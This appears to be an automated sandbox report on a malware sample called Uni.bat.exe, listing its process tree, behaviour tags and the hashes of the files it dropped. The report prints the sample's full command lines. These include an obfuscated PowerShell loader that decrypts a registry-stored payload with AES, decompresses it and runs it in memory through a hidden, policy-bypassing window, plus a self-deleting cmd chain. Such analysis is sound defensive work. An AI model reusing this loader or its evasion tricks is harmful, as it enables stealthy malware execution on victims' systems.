[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3936
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4976
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                4⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                PID:328
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:2532
                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                    PING localhost -n 8
                                                                                                    5⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:6092
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                    5⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4872
                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                    ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                    5⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:5336
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3540
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3740
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3952
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4128
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:2012
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4776
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:2612
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                      1⤵
                                                                                                        PID:4780
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:1552
                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:4328
                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1984
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                          1⤵
                                                                                                            PID:4972
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:1524
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                              1⤵
                                                                                                                PID:400
                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                1⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:4500
                                                                                                              • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                C:\Windows\System32\WaaSMedicAgent.exe 531f85b11ba90a510798bc83716ee7a8 mEGHRFZ5ukCUXXg4h+XOzQ.0.1.0.0.0
                                                                                                                1⤵
                                                                                                                • Sets service image path in registry
                                                                                                                PID:4904
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  2⤵
                                                                                                                    PID:3904
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                  1⤵
                                                                                                                    PID:2500
                                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                    1⤵
                                                                                                                      PID:2644
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                      1⤵
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:6000
                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4376
                                                                                                                    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:1860

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe

                                                                                                                        Filesize

                                                                                                                        442KB

                                                                                                                        MD5

                                                                                                                        04029e121a0cfa5991749937dd22a1d9

                                                                                                                        SHA1

                                                                                                                        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                        SHA256

                                                                                                                        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                        SHA512

                                                                                                                        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hxbfo55k.jmy.ps1

                                                                                                                        Filesize

                                                                                                                        60B

                                                                                                                        MD5

                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                        SHA1

                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                        SHA256

                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                        SHA512

                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                        SHA1

                                                                                                                        98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                        SHA256

                                                                                                                        ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                        SHA512

                                                                                                                        c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        f313c5b4f95605026428425586317353

                                                                                                                        SHA1

                                                                                                                        06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                        SHA256

                                                                                                                        129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                        SHA512

                                                                                                                        b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                        SHA1

                                                                                                                        a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                        SHA256

                                                                                                                        98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                        SHA512

                                                                                                                        1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                        SHA1

                                                                                                                        63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                        SHA256

                                                                                                                        727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                        SHA512

                                                                                                                        f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                        SHA1

                                                                                                                        5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                        SHA256

                                                                                                                        55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                        SHA512

                                                                                                                        5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        0b990e24f1e839462c0ac35fef1d119e

                                                                                                                        SHA1

                                                                                                                        9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                        SHA256

                                                                                                                        a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                        SHA512

                                                                                                                        c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                      • C:\Windows\System32\ucrtbased.dll

                                                                                                                        Filesize

                                                                                                                        1.8MB

                                                                                                                        MD5

                                                                                                                        7873612dddd9152d70d892427bc45ef0

                                                                                                                        SHA1

                                                                                                                        ab9079a43a784471ca31c4f0a34b698d99334dfa

                                                                                                                        SHA256

                                                                                                                        203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

                                                                                                                        SHA512

                                                                                                                        d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

                                                                                                                      • C:\Windows\System32\vcruntime140_1d.dll

                                                                                                                        Filesize

                                                                                                                        52KB

                                                                                                                        MD5

                                                                                                                        9ef28981adcbf4360de5f11b8f4ecff9

                                                                                                                        SHA1

                                                                                                                        219aaa1a617b1dfa36f3928bd1020e410666134f

                                                                                                                        SHA256

                                                                                                                        8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

                                                                                                                        SHA512

                                                                                                                        ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

                                                                                                                      • C:\Windows\System32\vcruntime140d.dll

                                                                                                                        Filesize

                                                                                                                        162KB

                                                                                                                        MD5

                                                                                                                        a366d6623c14c377c682d6b5451575e6

                                                                                                                        SHA1

                                                                                                                        a8894fcfb3aa06ad073b1f581b2e749b54827971

                                                                                                                        SHA256

                                                                                                                        7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

                                                                                                                        SHA512

                                                                                                                        cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

